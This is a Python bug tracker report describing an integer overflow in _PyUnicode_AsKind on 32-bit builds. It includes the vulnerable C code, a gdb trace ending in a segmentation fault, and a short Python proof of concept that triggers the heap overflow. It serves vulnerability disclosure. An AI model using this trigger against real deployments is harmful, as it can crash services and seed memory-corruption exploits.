[issue23368] integer overflow in _PyUnicode_AsKind

Sun Feb 1 14:58:39 CET 2015

New submission from paul:

# Bug
# ---
# 
# void*
# _PyUnicode_AsKind(PyObject *s, unsigned int kind)
# {
#     Py_ssize_t len;
#     ...
#     len = PyUnicode_GET_LENGTH(s);
#     ...
#     switch (kind) {
#     ...
#     case PyUnicode_4BYTE_KIND:
# 1       result = PyMem_Malloc(len * sizeof(Py_UCS4));
#         ...
#         else {
#             assert(skind == PyUnicode_1BYTE_KIND);
# 2           _PyUnicode_CONVERT_BYTES(
#                 Py_UCS1, Py_UCS4,
#                 PyUnicode_1BYTE_DATA(s),
#                 PyUnicode_1BYTE_DATA(s) + len,
#                 result);
#         }
# 
# 1. len equals 2^30, so len*sizeof(Py_UCS4) = 2^30 * 2^2 = 2^32, which wraps
#    around to 0 on this 32-bit build, because the multiplication is done in
#    size_t (the parameter type of PyMem_Malloc). The resulting buffer is
#    therefore 0 bytes long.
# 2. Characters from the source string s (1 byte each) are expanded to 4 bytes
#    each and copied into the 'result' buffer, which is too small to hold them,
#    so the copy writes past the end of the allocation.
# 
# Stack trace
# -----------
# 
# Breakpoint 2, _PyUnicode_AsKind (
#     s='a...', kind=4) at Objects/unicodeobject.c:2176
# 2176        if (PyUnicode_READY(s) == -1)
# (gdb) n
# 2179        len = PyUnicode_GET_LENGTH(s);
# (gdb) n
# 2180        skind = PyUnicode_KIND(s);
# (gdb) n
# 2181        if (skind >= kind) {
# (gdb) n
# 2185        switch (kind) {
# (gdb) n
# 2198            result = PyMem_Malloc(len * sizeof(Py_UCS4));
# (gdb) print len
# $10 = 1073741824
# (gdb) print skind
# $11 = 1
# (gdb) print kind
# $12 = 4
# (gdb) print len*4
# $13 = 0
# (gdb) c
# Continuing.
#  
# Program received signal SIGSEGV, Segmentation fault.
# 0x08130b56 in _PyUnicode_AsKind (
#     s='a...', kind=4) at Objects/unicodeobject.c:2210
# 2210                _PyUnicode_CONVERT_BYTES(
# 
# OS info
# -------
# 
# % ./python -V
# Python 3.4.1
#  
# % uname -a
# Linux ubuntu 3.8.0-29-generic #42~precise1-Ubuntu SMP Wed Aug 14 15:31:16 UTC 2013 i686 i686 i386 GNU/Linux
#  
# POC
# ---

txt=b"\x0a\x0a\x0a\x00"
uni=txt.decode("utf-32")
sub="a"*(2**30)
uni.count(sub)

----------
files: poc_askind.py
messages: 235176
nosy: pkt
priority: normal
severity: normal
status: open
title: integer overflow in _PyUnicode_AsKind
type: crash
versions: Python 3.4
Added file: http://bugs.python.org/file37967/poc_askind.py

_______________________________________
Python tracker <report at bugs.python.org>
<http://bugs.python.org/issue23368>
_______________________________________